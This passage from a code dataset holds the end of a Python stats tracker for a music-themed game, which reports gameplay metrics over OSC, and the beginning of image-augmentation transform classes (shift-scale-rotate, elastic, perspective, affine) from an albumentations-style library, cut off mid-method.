self.player__percent__dodges_over_enemy_collision = Stat(50.)\n self.player__percent__hit_rests_over_accidentals = Stat(50.)\n self.player__percent__missed_notes_over_dodges = Stat(50.)\n self.player__curr_velocity 
= ListStat(initial_length=2)\n self.player__curr_speed = Stat(0)\n self.player__angle = Stat(0)\n self.player__last_rotation_direction = Stat(0)\n self.player__percent__accuracy = Stat(0.0)\n self.player__time__between_kills = TrackerStat()\n self.player__time__between_getting_hit = TrackerStat()\n self.player__max_health = Stat(player_max_health)\n self.player__curr_health = Stat(player_max_health)\n self.player__health_lost = Stat(0)\n self.player__health_gained = Stat(0)\n self.player__projectile_hit_count = CounterStat(PROJECTILE_TYPES)\n self.player__hit_distance = TrackerStat()\n self.player__enemies_collided = Stat(0)\n self.player__dodges = Stat(0)\n self.player__missed_nearby_notes = Stat(0)\n self.player__alive_projectiles = Stat(0)\n\n self.notes__collected = Stat(0)\n self.notes__total = Stat(0)\n self.notes__score = Stat(0)\n self.notes__time__between_collecting = TrackerStat()\n self.notes__time__lifespan = TrackerStat()\n self.notes__percent__collected = Stat(0)\n\n self.weapon__selected = Stat(0)\n self.weapon__total_shots_fired = Stat(0)\n self.weapon__shots_per_weapon = ListStat(initial_length=2)\n self.weapon__hits_per_weapon = ListStat(initial_length=2)\n self.weapon__frames__per_weapon = ListStat(initial_length=2)\n self.weapon__percent__one_over_two = Stat(0)\n\n self.upgrades__total_dropped = Stat(0)\n self.upgrades__picked_up = Stat(0)\n self.upgrades__missed = Stat(0)\n self.upgrades__time__between_collecting = TrackerStat()\n self.upgrades__time__lifespan = TrackerStat()\n self.upgrades__percent__collected = Stat(0)\n\n self.enemies__total = Stat(0)\n self.enemies__standard_count = Stat(0)\n self.enemies__special_count = Stat(0)\n self.enemies__num_on_screen = TrackerStat(0)\n self.enemies__hit = Stat(0)\n self.enemies__killed = Stat(0)\n self.enemies__hit_distance = TrackerStat()\n self.enemies__alive_projectiles = Stat(0)\n self.enemies__score = Stat(0)\n self.enemies__time__lifespan = TrackerStat()\n\n self.game__play_count += 1\n\n def send_stats(self):\n \"\"\"Send all stats over OSC\"\"\"\n osc_stats = self.convert_osc_stats_to_dict()\n self.osc.union_bundle(osc_stats)\n if not debug.DISABLE_OSC_SEND:\n self.osc.send_full_bundle()\n\n def update_stats(self):\n \"\"\"Update stats based on other stats\"\"\"\n # Update score\n self.game__score = self.enemies__score + self.notes__score\n\n # Update player accuracy\n if self.weapon__total_shots_fired > 0:\n self.player__percent__accuracy = (self.enemies__hit / self.weapon__total_shots_fired) * 100\n\n # Update player position stats\n horizontal_half = \"left\" if self.player__position.list[0] < SCREEN_WIDTH / 2 else \"right\"\n vertical_half = \"top\" if self.player__position.list[1] < SCREEN_HEIGHT / 2 else \"bottom\"\n self.player__horizontal_half.update(horizontal_half)\n self.player__vertical_half.update(vertical_half)\n\n if vertical_half == \"top\":\n # top left == quadrant 0\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(0, 1)\n # top right == quadrant 1\n else:\n self.player__frames__per_screen_quadrant.add_at_index(1, 1)\n else:\n # bottom left == quadrant 2\n if horizontal_half == \"left\":\n self.player__frames__per_screen_quadrant.add_at_index(2, 1)\n # bottom right == quadrant 3\n else:\n self.player__frames__per_screen_quadrant.add_at_index(3, 1)\n\n # Update movement vs rotating vs non-movement ratio\n total = self.player__frames__moving + self.player__frames__rotating\n if total > 0:\n self.player__percent__moving_over_rotating = 
(self.player__frames__moving / total) * 100\n\n # Update movement and rotating vs just movement or just rotation\n total = self.player__frames__moving + self.player__frames__rotating + self.player__frames__moving_and_rotating\n if total > 0:\n self.player__percent__moving_and_rotating = (self.player__frames__moving_and_rotating / total) * 100\n\n # Update firing vs not ratio\n if self.game__total_frames > 0:\n self.player__percent__firing_weapon = (self.player__frames__firing / self.game__total_frames) * 100\n\n # Upgrade percentage\n if self.upgrades__total_dropped > 0:\n self.upgrades__percent__collected = (self.upgrades__picked_up / self.upgrades__total_dropped) * 100\n\n if self.notes__total > 0:\n self.notes__percent__collected = (self.notes__collected / self.notes__total) * 100\n\n # Update weapon usage\n if self.weapon__total_shots_fired > 0:\n self.weapon__percent__one_over_two = \\\n (self.weapon__shots_per_weapon.get(0) / self.weapon__total_shots_fired) * 100\n\n # Health lost vs gained\n total = self.player__health_lost + self.player__health_gained\n if total > 0:\n self.player__percent__health_lost_over_gained = (self.player__health_lost / total) * 100\n\n # Dodges vs enemy collisions\n total = self.player__dodges + self.player__enemies_collided\n if total > 0:\n self.player__percent__dodges_over_enemy_collision = (self.player__dodges / total) * 100\n\n # Missed notes vs dodges\n total = self.player__missed_nearby_notes + self.player__dodges\n if total > 0:\n self.player__percent__missed_notes_over_dodges = (self.player__missed_nearby_notes / total) * 100\n\n # Rests vs accidentals\n projectile_hit_count = self.player__projectile_hit_count.count\n if projectile_hit_count > 0:\n num_rests = self.player__projectile_hit_count.get(REST)\n self.player__percent__hit_rests_over_accidentals.update((num_rests / projectile_hit_count) * 100)\n\n # Note vs enemy score\n if self.game__score > 0:\n self.game__percent__note_over_enemy_score = (self.notes__score / self.game__score) * 100\n\n def convert_osc_stats_to_dict(self) -> Dict[str, Any]:\n \"\"\"Convert stats into a dictionary to be used by the OSC manager\"\"\"\n stat_dict = {}\n\n for stat_name, stat in self.__dict__.items():\n if not hasattr(stat, 'send') or not stat.send:\n continue\n\n if isinstance(stat, Stat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, TimeStat):\n stat_dict[stat_name] = stat.time\n elif isinstance(stat, TrackerStat):\n stat_dict[stat_name] = stat.value\n elif isinstance(stat, ListStat):\n stat_dict[stat_name] = stat.list\n elif isinstance(stat, TextStat):\n stat_dict[stat_name] = stat.text\n elif isinstance(stat, CounterStat):\n stat_dict[stat_name] = stat.items\n\n return stat_dict\n\n def set_game_time(self, total_time_elapsed_ms: int):\n \"\"\"Set the time that a new game playthrough begins\"\"\"\n # calculate playthrough time\n playthrough_time_elapsed = total_time_elapsed_ms - self.start_time\n self.game__time__current_playthrough = TimeStat(playthrough_time_elapsed)\n\n # calculate total time\n self.game__time__total_played = TimeStat(total_time_elapsed_ms)\n\n def print_stats(self):\n \"\"\"Print Stats to the console\"\"\"\n print(f'---- Game {self.game__play_count} ----')\n print(f'Score: {self.game__score}')\n print(f'Enemies Killed: {self.enemies__killed}')\n print(f'Enemy shots dodged: {self.player__dodges}')\n print(f'Avg time to kill an Enemy: {self.player__time__between_kills.avg / 1000}')\n print(f'Total Shots Fired: {self.weapon__total_shots_fired}')\n print(f'Enemies Hit: 
{self.enemies__hit}')\n print(f'Player Shot Accuracy: {self.player__percent__accuracy}%')\n print(\n f'Time Survived: {self.game__time__current_playthrough.hours} Hours, '\n f'{self.game__time__current_playthrough.minutes} Minutes, '\n f'{self.game__time__current_playthrough.seconds} Seconds'\n )\n print(\n f'Total Time Played: {self.game__time__total_played.hours} Hours, '\n f'{self.game__time__total_played.minutes} Minutes, '\n f'{self.game__time__total_played.seconds} Seconds'\n )\n print()\n\n def get_endgame_stats(self) -> str:\n \"\"\"Formats the endgame stats text to be displayed during the DEATH MENU\"\"\"\n stats_to_report = [\n self.game__score,\n self.enemies__killed,\n int(self.player__percent__accuracy.value),\n self.player__health_lost,\n self.notes__collected,\n self.upgrades__picked_up,\n self.game__time__current_playthrough.time_display,\n self.game__time__total_played.time_display,\n ]\n\n # Format lines without buffer\n stats_str_no_buffer = [\n stat_str.format(buffer=0, value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n # Calculate buffer for each line\n longest_line = len(max(stats_str_no_buffer, key=len))\n buffer_per_line = [\n ' ' * (longest_line - len(line)) for line in stats_str_no_buffer\n ]\n\n # Re-format lines with buffer\n stats_str_with_buffer = [\n stat_str.format(buffer=buffer_per_line[idx], value=stats_to_report[idx])\n for idx, stat_str in enumerate(self.OUTPUT_STATS_FORMAT)\n ]\n\n return '\\n'.join(stats_str_with_buffer)\n\n\n\nstat_tracker = StatTracker(osc=osc)\n","repo_name":"gloliva/HyperLydian","sub_path":"game/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":22049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"928641809","text":"import math\nimport random\nfrom enum import Enum\nfrom typing import Dict, Optional, Sequence, Tuple, Union\n\nimport cv2\nimport numpy as np\nimport skimage.transform\n\nfrom albumentations.core.bbox_utils import denormalize_bbox, normalize_bbox\n\nfrom ... import random_utils\nfrom ...core.transforms_interface import (\n BoxInternalType,\n DualTransform,\n ImageColorType,\n KeypointInternalType,\n ScaleFloatType,\n to_tuple,\n)\nfrom ..functional import bbox_from_mask\nfrom . import functional as F\n\n__all__ = [\n \"ShiftScaleRotate\",\n \"ElasticTransform\",\n \"Perspective\",\n \"Affine\",\n \"PiecewiseAffine\",\n \"VerticalFlip\",\n \"HorizontalFlip\",\n \"Flip\",\n \"Transpose\",\n \"OpticalDistortion\",\n \"GridDistortion\",\n \"PadIfNeeded\",\n]\n\n\nclass ShiftScaleRotate(DualTransform):\n \"\"\"Randomly apply affine transforms: translate, scale and rotate the input.\n\n Args:\n shift_limit ((float, float) or float): shift factor range for both height and width. If shift_limit\n is a single float value, the range will be (-shift_limit, shift_limit). Absolute values for lower and\n upper bounds should lie in range [0, 1]. Default: (-0.0625, 0.0625).\n scale_limit ((float, float) or float): scaling factor range. If scale_limit is a single float value, the\n range will be (-scale_limit, scale_limit). Note that the scale_limit will be biased by 1.\n If scale_limit is a tuple, like (low, high), sampling will be done from the range (1 + low, 1 + high).\n Default: (-0.1, 0.1).\n rotate_limit ((int, int) or int): rotation range. If rotate_limit is a single int value, the\n range will be (-rotate_limit, rotate_limit). 
Default: (-45, 45).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n shift_limit_x ((float, float) or float): shift factor range for width. If it is set then this value\n instead of shift_limit will be used for shifting width. If shift_limit_x is a single float value,\n the range will be (-shift_limit_x, shift_limit_x). Absolute values for lower and upper bounds should lie in\n the range [0, 1]. Default: None.\n shift_limit_y ((float, float) or float): shift factor range for height. If it is set then this value\n instead of shift_limit will be used for shifting height. If shift_limit_y is a single float value,\n the range will be (-shift_limit_y, shift_limit_y). Absolute values for lower and upper bounds should lie\n in the range [0, 1]. Default: None.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or \"ellipse\".\n Default: \"largest_box\"\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n shift_limit=0.0625,\n scale_limit=0.1,\n rotate_limit=45,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n shift_limit_x=None,\n shift_limit_y=None,\n rotate_method=\"largest_box\",\n always_apply=False,\n p=0.5,\n ):\n super(ShiftScaleRotate, self).__init__(always_apply, p)\n self.shift_limit_x = to_tuple(shift_limit_x if shift_limit_x is not None else shift_limit)\n self.shift_limit_y = to_tuple(shift_limit_y if shift_limit_y is not None else shift_limit)\n self.scale_limit = to_tuple(scale_limit, bias=1.0)\n self.rotate_limit = to_tuple(rotate_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.rotate_method = rotate_method\n\n if self.rotate_method not in [\"largest_box\", \"ellipse\"]:\n raise ValueError(f\"Rotation method {self.rotate_method} is not valid.\")\n\n def apply(self, img, angle=0, scale=0, dx=0, dy=0, interpolation=cv2.INTER_LINEAR, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img, angle=0, scale=0, dx=0, dy=0, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_keypoint(self, keypoint, angle=0, scale=0, dx=0, dy=0, rows=0, cols=0, **params):\n return F.keypoint_shift_scale_rotate(keypoint, angle, scale, dx, dy, rows, cols)\n\n def get_params(self):\n return {\n \"angle\": random.uniform(self.rotate_limit[0], self.rotate_limit[1]),\n \"scale\": random.uniform(self.scale_limit[0], self.scale_limit[1]),\n \"dx\": random.uniform(self.shift_limit_x[0], self.shift_limit_x[1]),\n \"dy\": random.uniform(self.shift_limit_y[0], 
self.shift_limit_y[1]),\n }\n\n def apply_to_bbox(self, bbox, angle, scale, dx, dy, **params):\n return F.bbox_shift_scale_rotate(bbox, angle, scale, dx, dy, self.rotate_method, **params)\n\n def get_transform_init_args(self):\n return {\n \"shift_limit_x\": self.shift_limit_x,\n \"shift_limit_y\": self.shift_limit_y,\n \"scale_limit\": to_tuple(self.scale_limit, bias=-1.0),\n \"rotate_limit\": self.rotate_limit,\n \"interpolation\": self.interpolation,\n \"border_mode\": self.border_mode,\n \"value\": self.value,\n \"mask_value\": self.mask_value,\n \"rotate_method\": self.rotate_method,\n }\n\n\nclass ElasticTransform(DualTransform):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n Based on https://gist.github.com/ernestum/601cdf56d2b424757de5\n\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Args:\n alpha (float):\n sigma (float): Gaussian filter parameter.\n alpha_affine (float): The range will be (-alpha_affine, alpha_affine)\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n approximate (boolean): Whether to smooth displacement map with fixed kernel size.\n Enabling this option gives ~2X speedup on large images.\n same_dxdy (boolean): Whether to use same random generated shift for x and y.\n Enabling this option gives ~2X speedup.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n alpha=1,\n sigma=50,\n alpha_affine=50,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n always_apply=False,\n approximate=False,\n same_dxdy=False,\n p=0.5,\n ):\n super(ElasticTransform, self).__init__(always_apply, p)\n self.alpha = alpha\n self.alpha_affine = alpha_affine\n self.sigma = sigma\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.approximate = approximate\n self.same_dxdy = same_dxdy\n\n def apply(self, img, random_state=None, interpolation=cv2.INTER_LINEAR, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n interpolation,\n self.border_mode,\n self.value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_mask(self, img, random_state=None, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_bbox(self, bbox, random_state=None, **params):\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n 
bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.elastic_transform(\n mask,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\"random_state\": random.randint(0, 10000)}\n\n def get_transform_init_args_names(self):\n return (\n \"alpha\",\n \"sigma\",\n \"alpha_affine\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n \"approximate\",\n \"same_dxdy\",\n )\n\n\nclass Perspective(DualTransform):\n \"\"\"Perform a random four point perspective transform of the input.\n\n Args:\n scale (float or (float, float)): standard deviation of the normal distributions. These are used to sample\n the random distances of the subimage's corners from the full image's corners.\n If scale is a single float value, the range will be (0, scale). Default: (0.05, 0.1).\n keep_size (bool): Whether to resize image’s back to their original size after applying the perspective\n transform. If set to False, the resulting images may end up having different shapes\n and will always be a list, never an array. Default: True\n pad_mode (OpenCV flag): OpenCV border mode.\n pad_val (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n Default: 0\n mask_pad_val (int, float, list of int, list of float): padding value for mask\n if border_mode is cv2.BORDER_CONSTANT. Default: 0\n fit_output (bool): If True, the image plane size and position will be adjusted to still capture\n the whole image after perspective transformation. (Followed by image resizing if keep_size is set to True.)\n Otherwise, parts of the transformed image may be outside of the image plane.\n This setting should not be set to True when using large scale values as it could lead to very large images.\n Default: False\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n scale=(0.05, 0.1),\n keep_size=True,\n pad_mode=cv2.BORDER_CONSTANT,\n pad_val=0,\n mask_pad_val=0,\n fit_output=False,\n interpolation=cv2.INTER_LINEAR,\n always_apply=False,\n p=0.5,\n ):\n super().__init__(always_apply, p)\n self.scale = to_tuple(scale, 0)\n self.keep_size = keep_size\n self.pad_mode = pad_mode\n self.pad_val = pad_val\n self.mask_pad_val = mask_pad_val\n self.fit_output = fit_output\n self.interpolation = interpolation\n\n def apply(self, img, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective(\n img, matrix, max_width, max_height, self.pad_val, self.pad_mode, self.keep_size, params[\"interpolation\"]\n )\n\n def apply_to_bbox(self, bbox, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_bbox(bbox, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size)\n\n def apply_to_keypoint(self, keypoint, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_keypoint(\n keypoint, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n scale = random_utils.uniform(*self.scale)\n points = random_utils.normal(0, scale, [4, 2])\n points = np.mod(np.abs(points), 1)\n\n # top left -- no changes needed, just use jitter\n # top right\n points[1, 0] = 1.0 - points[1, 0] # w = 1.0 - jitter\n # bottom right\n points[2] = 1.0 - points[2] # w = 1.0 - jitt\n # bottom left\n points[3, 1] = 1.0 - points[3, 1] # h = 1.0 - jitter\n\n points[:, 0] *= w\n points[:, 1] *= h\n\n # Obtain a consistent order of the points and unpack them individually.\n # Warning: don't just do (tl, tr, br, bl) = _order_points(...)\n # here, because the reordered points is used further below.\n points = self._order_points(points)\n tl, tr, br, bl = points\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n min_width = None\n max_width = None\n while min_width is None or min_width < 2:\n width_top = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n width_bottom = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n max_width = int(max(width_top, width_bottom))\n min_width = int(min(width_top, width_bottom))\n if min_width < 2:\n step_size = (2 - min_width) / 2\n tl[0] -= step_size\n tr[0] += step_size\n bl[0] -= step_size\n br[0] += step_size\n\n # compute the height of the new image, which will be the maximum distance between the top-right\n # and bottom-right y-coordinates or the top-left and bottom-left y-coordinates\n min_height = None\n max_height = None\n while min_height is None or min_height < 2:\n height_right = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n height_left = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n max_height = int(max(height_right, height_left))\n min_height = int(min(height_right, height_left))\n if min_height < 2:\n step_size = (2 - min_height) / 2\n tl[1] -= step_size\n tr[1] -= step_size\n bl[1] += step_size\n br[1] += step_size\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. 
top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left order\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n dst = np.array([[0, 0], [max_width, 0], [max_width, max_height], [0, max_height]], dtype=np.float32)\n\n # compute the perspective transform matrix and then apply it\n m = cv2.getPerspectiveTransform(points, dst)\n\n if self.fit_output:\n m, max_width, max_height = self._expand_transform(m, (h, w))\n\n return {\"matrix\": m, \"max_height\": max_height, \"max_width\": max_width, \"interpolation\": self.interpolation}\n\n @classmethod\n def _expand_transform(cls, matrix, shape):\n height, width = shape\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2, max_height\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n rect = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n dst = cv2.perspectiveTransform(np.array([rect]), matrix)[0]\n\n # get min x, y over transformed 4 points\n # then modify target points by subtracting these minima => shift to (0, 0)\n dst -= dst.min(axis=0, keepdims=True)\n dst = np.around(dst, decimals=0)\n\n matrix_expanded = cv2.getPerspectiveTransform(rect, dst)\n max_width, max_height = dst.max(axis=0)\n return matrix_expanded, int(max_width), int(max_height)\n\n @staticmethod\n def _order_points(pts: np.ndarray) -> np.ndarray:\n pts = np.array(sorted(pts, key=lambda x: x[0]))\n left = pts[:2] # points with smallest x coordinate - left points\n right = pts[2:] # points with greatest x coordinate - right points\n\n if left[0][1] < left[1][1]:\n tl, bl = left\n else:\n bl, tl = left\n\n if right[0][1] < right[1][1]:\n tr, br = right\n else:\n br, tr = right\n\n return np.array([tl, tr, br, bl], dtype=np.float32)\n\n def get_transform_init_args_names(self):\n return \"scale\", \"keep_size\", \"pad_mode\", \"pad_val\", \"mask_pad_val\", \"fit_output\", \"interpolation\"\n\n\nclass Affine(DualTransform):\n \"\"\"Augmentation to apply affine transformations to images.\n This is mostly a wrapper around the corresponding classes and functions in OpenCV.\n\n Affine transformations involve:\n\n - Translation (\"move\" image on the x-/y-axis)\n - Rotation\n - Scaling (\"zoom\" in/out)\n - Shear (move one side of the image, turning a square into a trapezoid)\n\n All such transformations can create \"new\" pixels in the image without a defined content, e.g.\n if the image is translated to the left, pixels are created on the right.\n A method has to be defined to deal with these pixel values.\n The parameters `cval` and `mode` of this class deal with this.\n\n Some transformations involve interpolations between several pixels\n of the input image to generate output pixel values. The parameters `interpolation` and\n `mask_interpolation` deals with the method of interpolation used for this.\n\n Args:\n scale (number, tuple of number or dict): Scaling factor to use, where ``1.0`` denotes \"no change\" and\n ``0.5`` is zoomed out to ``50`` percent of the original size.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That the same range will be used for both x- and y-axis. 
To keep the aspect ratio, set\n ``keep_ratio=True``, then the same value will be used for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes. Note that when\n the ``keep_ratio=True``, the x- and y-axis ranges should be the same.\n translate_percent (None, number, tuple of number or dict): Translation as a fraction of the image height/width\n (x-translation, y-translation), where ``0`` denotes \"no change\"\n and ``0.5`` denotes \"half of the axis size\".\n * If ``None`` then equivalent to ``0.0`` unless `translate_px` has a value other than ``None``.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That sampled fraction value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_px (None, int, tuple of int or dict): Translation in pixels.\n * If ``None`` then equivalent to ``0`` unless `translate_percent` has a value other than ``None``.\n * If a single int, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from\n the discrete interval ``[a..b]``. That number will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n rotate (number or tuple of number): Rotation in degrees (**NOT** radians), i.e. expected value range is\n around ``[-360, 360]``. Rotation happens around the *center* of the image,\n not the top left corner as in some other frameworks.\n * If a number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``\n and used as the rotation value.\n shear (number, tuple of number or dict): Shear in degrees (**NOT** radians), i.e. 
expected value range is\n around ``[-360, 360]``, with reasonable values being in the range of ``[-45, 45]``.\n * If a number, then that value will be used for all images as\n the shear on the x-axis (no shear on the y-axis will be done).\n * If a tuple ``(a, b)``, then two value will be uniformly sampled per image\n from the interval ``[a, b]`` and be used as the x- and y-shear value.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n interpolation (int): OpenCV interpolation flag.\n mask_interpolation (int): OpenCV interpolation flag.\n cval (number or sequence of number): The constant value to use when filling in newly created pixels.\n (E.g. translating by 1px to the right will create a new 1px-wide column of pixels\n on the left of the image).\n The value is only used when `mode=constant`. The expected value range is ``[0, 255]`` for ``uint8`` images.\n cval_mask (number or tuple of number): Same as cval but only for masks.\n mode (int): OpenCV border flag.\n fit_output (bool): If True, the image plane size and position will be adjusted to tightly capture\n the whole image after affine transformation (`translate_percent` and `translate_px` are ignored).\n Otherwise (``False``), parts of the transformed image may end up outside the image plane.\n Fitting the output shape can be useful to avoid corners of the image being outside the image plane\n after applying rotations. Default: False\n keep_ratio (bool): When True, the original aspect ratio will be kept when the random scale is applied.\n Default: False.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or\n \"ellipse\"[1].\n Default: \"largest_box\"\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n Reference:\n [1] https://arxiv.org/abs/2109.13488\n \"\"\"\n\n def __init__(\n self,\n scale: Optional[Union[float, Sequence[float], dict]] = None,\n translate_percent: Optional[Union[float, Sequence[float], dict]] = None,\n translate_px: Optional[Union[int, Sequence[int], dict]] = None,\n rotate: Optional[Union[float, Sequence[float]]] = None,\n shear: Optional[Union[float, Sequence[float], dict]] = None,\n interpolation: int = cv2.INTER_LINEAR,\n mask_interpolation: int = cv2.INTER_NEAREST,\n cval: Union[int, float, Sequence[int], Sequence[float]] = 0,\n cval_mask: Union[int, float, Sequence[int], Sequence[float]] = 0,\n mode: int = cv2.BORDER_CONSTANT,\n fit_output: bool = False,\n keep_ratio: bool = False,\n rotate_method: str = \"largest_box\",\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super().__init__(always_apply=always_apply, p=p)\n\n params = [scale, translate_percent, translate_px, rotate, shear]\n if all([p is None for p in params]):\n scale = {\"x\": (0.9, 1.1), \"y\": (0.9, 1.1)}\n translate_percent = {\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}\n rotate = (-15, 15)\n shear = {\"x\": (-10, 10), \"y\": (-10, 10)}\n else:\n scale = scale if scale is not None else 1.0\n rotate = rotate if rotate is not None else 0.0\n shear = shear if shear is not None else 0.0\n\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.scale = self._handle_dict_arg(scale, \"scale\")\n self.translate_percent, self.translate_px = self._handle_translate_arg(translate_px, translate_percent)\n self.rotate = to_tuple(rotate, rotate)\n self.fit_output = fit_output\n self.shear = self._handle_dict_arg(shear, \"shear\")\n self.keep_ratio = keep_ratio\n self.rotate_method = rotate_method\n\n if self.keep_ratio and self.scale[\"x\"] != self.scale[\"y\"]:\n raise ValueError(\n \"When keep_ratio is True, the x and y scale range should be identical. got {}\".format(self.scale)\n )\n\n def get_transform_init_args_names(self):\n return (\n \"interpolation\",\n \"mask_interpolation\",\n 